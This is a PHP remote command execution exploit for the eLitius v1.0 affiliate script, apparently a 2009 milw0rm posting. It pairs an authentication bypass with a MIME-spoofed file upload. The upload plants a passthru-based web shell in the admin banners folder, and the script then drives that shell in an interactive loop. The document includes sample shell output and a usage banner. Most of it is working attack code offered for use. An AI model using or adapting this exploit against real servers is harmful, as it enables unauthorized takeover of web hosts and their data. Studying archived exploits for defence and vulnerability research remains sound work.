1 <?php 2 //786 3 /* 4 ============================================================================== 5 _ _ _ _ _ _ 6 / \ | | | | / \ | | | | 7 / _ \ | | | | / _ \ | |_| | 8 / ___ \ | |___ | |___ / ___ \ | _ | 9 IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| 10 11 12 ============================================================================== 13 ____ _ _ _ _ ___ _ __ 14 / ___| | || | | \ | | / _ \ | |/ / 15 | | _ | || |_ | \| | | | | | | ’ / 16 | |_| | |__ _| | |\ | | |_| | | . \ 17 \____| |_| |_| \_| \___/ |_|\_\ I’m From Iran... 18 19 ============================================================================== 20 eLitius v1.0 Remote Command Execution Exploit 21 ============================================================================== 22 23 [ª] Script:.............[ eLitius v1.0 ].............................. 24 [ª] Website:............[ http://www.elitius.com/ ]................... 25 [ª] Today:..............[ 30042009 ].................................. 26 [ª] Founder:............[ G4N0K | mail[o]ganok[sh!t]gmail.com ]....... 27 28 29 [!] What is going on... 30 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 31 00. Auth Bypass... 32 01. Arbitrary File upload (MIME−Type Spoofing)... 33 34 35 [+] demo... 36 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 37 xpl.php 127.0.0.1 /eLitius_v_1_0/ 38 39 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 40 | eLitius v1.0 Remote Command Execution Exploit | 41 | by: G4N0K | mail[o]ganok[ta]com | 42 | Thanks: ALLAH, MSD, SMN, AMD, AFN | 43 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 44 45 46 [+] Trying to exploit 127.0.0.1... 47 48 [+] File has been uploaded... 49 50 [+] Now you can exec your commands... 51 52 php−shell@127.0.0.1# dir Page 1/4 eLitius 1.0 Remote Command Execution Exploit G4N0K 05/04/2009 53 Volume in drive E has no label. 54 Volume Serial Number is 042D−D300 55 56 Directory of E:\www\eLitius_v_1_0\admin\banners 57 58 09/09/2009 03:01 AM <DIR> . 59 09/09/2009 03:01 AM <DIR> .. 60 09/09/2009 07:58 PM 104,747 1.gif 61 09/09/2009 03:01 AM 89 banner_ditails.php 62 09/09/2009 07:58 PM 104,747 DEH−P9800BT remote control.gif 63 09/09/2009 08:33 AM 19,638 sponimage.php.gif 64 4 File(s) 232,681 bytes 65 2 Dir(s) 125,026,304 bytes free 66 php−shell@127.0.0.1# exit 67 C:\> 68 69 */ 70 error_reporting(0); 71 72 if (php_sapi_name() <> "cli") { 73 die("WTF, Run Me From CommandLine..."); 74 } 75 if ($argc <> 3){__nfo();__usg();exit;} 76 $hst = $argv[1]; 77 $pth = $argv[2]; 78 79 function __snd($hst, $pkt) 80 { 81 $socket = fsockopen($hst, 80, $errno, $errstr, 30); 82 $ggg=’’; 83 if (!$socket) { 84 echo "\r\n [+] Socket err#: $errstr ($errno)\n\r";exit; 85 } else { 86 fwrite($socket, $pkt); 87 while (!feof($socket)) { 88 $g4n0k.=fgets($socket, 2048); 89 } 90 fclose($socket); 91 return $g4n0k; 92 } 93 } 94 95 function __srch($wt){ 96 $pos = strpos($wt, ’gnkgnkgnk’); 97 $pos_end = strrpos($wt, ’gnkgnkgnk’); 98 if (!$pos && !$pos_end){echo " [!] error...\r\n";} 99 $rest = substr($wt, $pos+9, ($pos_end − ($pos+9))); 100 return $rest; 101 } 102 103 function __nfo() 104 { Page 2/4 eLitius 1.0 Remote Command Execution Exploit G4N0K 05/04/2009 105 $ganok = <<<EOL 106 107 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 108 | eLitius v1.0 Remote Command Execution Exploit | 109 | by: G4N0K | mail[o]ganok[ta]com | 110 | Thanks: ALLAH, MSD, SMN, AMD, AFN | 111 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 112 \r\n 113 EOL; 114 print $ganok; 115 } 116 117 function __usg() 118 { 119 echo <<<GNK 120 uasge...: 121 xpl.php host path 122 xpl.php 127.0.0.1 /eLitius_v_1_0/ 123 GNK; 124 } 125 126 127 $joke = ’−−−−−−−−−−−−−−−−−−−−−−−−−−−−−3902153292 128 Content−Disposition: form−data; name="userfile"; filename="banner_ditails.php" 129 Content−Type: image/gif 130 131 <?php error_reporting(0);print("gnkgnkgnk");passthru($_GET["gnk"]);print("gnkgnkgnk"); ?> 132 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−3902153292 133 Content−Disposition: form−data; name="fileupload" 134 135 Upload 136 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−3902153292 137 Content−Disposition: form−data; name="directory" 138 139 banners 140 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−3902153292−− 141 ’; 142 143 $msd_pyld = "POST {$pth}admin/uploadimage.php HTTP/1.1\r\n"; 144 $msd_pyld .= "Host: {$hst}\r\n"; 145 $msd_pyld .= "Keep−Alive: 300\n\r"; 146 $msd_pyld .= "Connection: keep−alive\r\n"; 147 $msd_pyld .= "Content−Length: ".strlen($joke)."\r\n"; 148 $msd_pyld .= "Content−Type: multipart/form−data; boundary=−−−−−−−−−−−−−−−−−−−−−−−−−−−3902153292\r\n\r\n"; 149 $msd_pyld .= $joke; 150 151 __nfo(); 152 echo "\r\n [+] Trying to exploit {$hst}...\n\r"; 153 if (stristr(__snd($hst, $msd_pyld), "uploaded")){ 154 echo "\r\n [+] File has been uploaded...\n\r\r\n [+] Now you can exec your commands...\r\n"; } else { 155 echo "\r\n [+] Oops!, Upload failed.\n\r"; exit; 156 } Page 3/4 eLitius 1.0 Remote Command Execution Exploit G4N0K 05/04/2009 157 158 while(1) 159 { 160 echo "\r\nphp−shell@{$hst}# "; 161 if (($cmd = str_replace (" ", "%20", trim(fgets(STDIN)))) == "exit") exit; 162 $smn_pyld = "GET {$pth}admin/banners/banner_ditails.php?gnk=".$cmd." HTTP/1.1\r\n"; 163 $smn_pyld .= "Host: {$hst}\r\n"; 164 $smn_pyld .= "Connection: close\n\r\n\r"; 165 print __srch(__snd($hst, $smn_pyld)); 166 } 167 168 ?> 169 170 # milw0rm.com [2009−05−04] Page 4/4 eLitius 1.0 Remote Command Execution Exploit G4N0K 05/04/2009